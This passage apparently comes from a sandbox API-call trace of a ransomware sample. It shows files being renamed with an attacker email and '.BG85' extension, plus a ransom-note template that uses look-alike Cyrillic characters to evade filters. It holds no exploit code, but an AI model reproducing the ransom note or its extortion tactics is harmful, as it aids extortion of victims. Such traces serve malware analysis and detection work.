10.0\\Reader\\Browser\\nppdf32.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.sky"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\[BobGreen85@criptext.com].36IGl4mI-T0tfVl5A.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\[bobgreen85@criptext.com].36igl4mi-t0tfvl5a.bg85"), dwFlags=0x1) returned 1 [0097.829] GetTickCount () returned 0x114eaec [0097.829] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21816824646) returned 1 [0097.830] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.slv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\[BobGreen85@criptext.com].JbTl27s3-JOASRsvx.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\[bobgreen85@criptext.com].jbtl27s3-joasrsvx.bg85"), dwFlags=0x1) returned 1 [0097.831] GetTickCount () returned 0x114eaec [0097.831] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21816976529) returned 1 [0097.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\eula.ini"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\[BobGreen85@criptext.com].ED6PIQBo-kP9jQSnO.BG85" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\[bobgreen85@criptext.com].ed6piqbo-kp9jqsno.bg85"), dwFlags=0x1) returned 1 [0098.151] GetTickCount () returned 0x114ec24 [0098.151] QueryPerformanceCounter (in: lpPerformanceCount=0x381fe3c | out: lpPerformanceCount=0x381fe3c*=21849029070) returned 1 Thread: id = 26 os_tid = 0xa54 [0064.340] FindResourceW (hModule=0x400000, lpName="RDM", lpType=0xa) returned 0x4f54d0 [0064.341] LoadResource (hModule=0x400000, hResInfo=0x4f54d0) returned 0x527260 [0064.341] SizeofResource (hModule=0x400000, hResInfo=0x4f54d0) returned 0x1c18 [0064.341] LockResource (hResData=0x527260) returned 0x527260 [0064.341] FreeResource (hResData=0x527260) returned 0 [0064.341] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0064.341] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0064.341] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0064.341] LockResource (hResData=0x526358) returned 0x526358 [0064.341] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa55f0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0064.341] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa55f0, cbMultiByte=38, lpWideCharStr=0x1f9f5ec, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0064.341] FreeResource (hResData=0x526358) returned 0 [0064.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0064.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa55f4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0064.341] GetCurrentThreadId () returned 0xa54 [0064.341] GetCurrentThreadId () returned 0xa54 [0064.341] GetCurrentThreadId () returned 0xa54 [0064.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e990d8, cbMultiByte=7192, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7192 [0064.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e990d8, cbMultiByte=7192, lpWideCharStr=0x269841c, cchWideChar=7192 | out: lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 [EML1]\\par\r\n[EML2]\\par\r\n[EML3]\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 [KID]\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n") returned 7192 [0064.342] CharUpperBuffW (in: lpsz="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 [EML1]\\par\r\n[EML2]\\par\r\n[EML3]\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 [KID]\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 [RDM_STR]\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchLength=0x1c17 | out: lpsz="{\\RTF1\\ANSI\\ANSICPG1251\\DEFF0\\NOUICOMPAT\\DEFLANG1049{\\FONTTBL{\\F0\\FNIL\\FCHARSET0 CALIBRI;}{\\F1\\FNIL\\FCHARSET204 CALIBRI;}}\r\n{\\COLORTBL ;\\RED255\\GREEN0\\BLUE0;\\RED255\\GREEN255\\BLUE255;}\r\n{\\*\\GENERATOR RICHED20 10.0.15063}\\VIEWKIND4\\UC1 \r\n\\PARD\\RI-74\\SL240\\SLMULT1\\QC\\TX8378\\B\\F0\\FS24\\LANG1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\PAR\r\n\r\n\\PARD\\RI-74\\SL240\\SLMULT1\\TX8378\\PAR\r\n\\B0 